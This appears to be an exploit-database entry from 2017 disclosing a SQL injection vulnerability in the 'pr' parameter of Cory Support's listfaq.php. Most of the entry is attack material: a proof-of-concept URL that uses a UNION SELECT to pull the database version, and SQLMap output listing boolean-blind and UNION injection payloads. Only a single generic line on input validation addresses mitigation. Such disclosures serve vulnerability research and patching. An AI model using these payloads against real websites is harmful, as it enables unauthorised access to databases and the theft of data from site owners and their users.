vendor:
Cory Support
by:
v3n0m
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Cory Support
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Mac OS Sierra v10.12.6
2017
Cory Support (pr) SQL Injection Vulnerability
An attacker can exploit this vulnerability to read from the database. The parameter 'pr' is vulnerable. Proof of Concept: http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()-- Exploitation via SQLMap: Parameter: pr (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pr=1 AND 4809=4809 Vector: AND [INFERENCE] Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.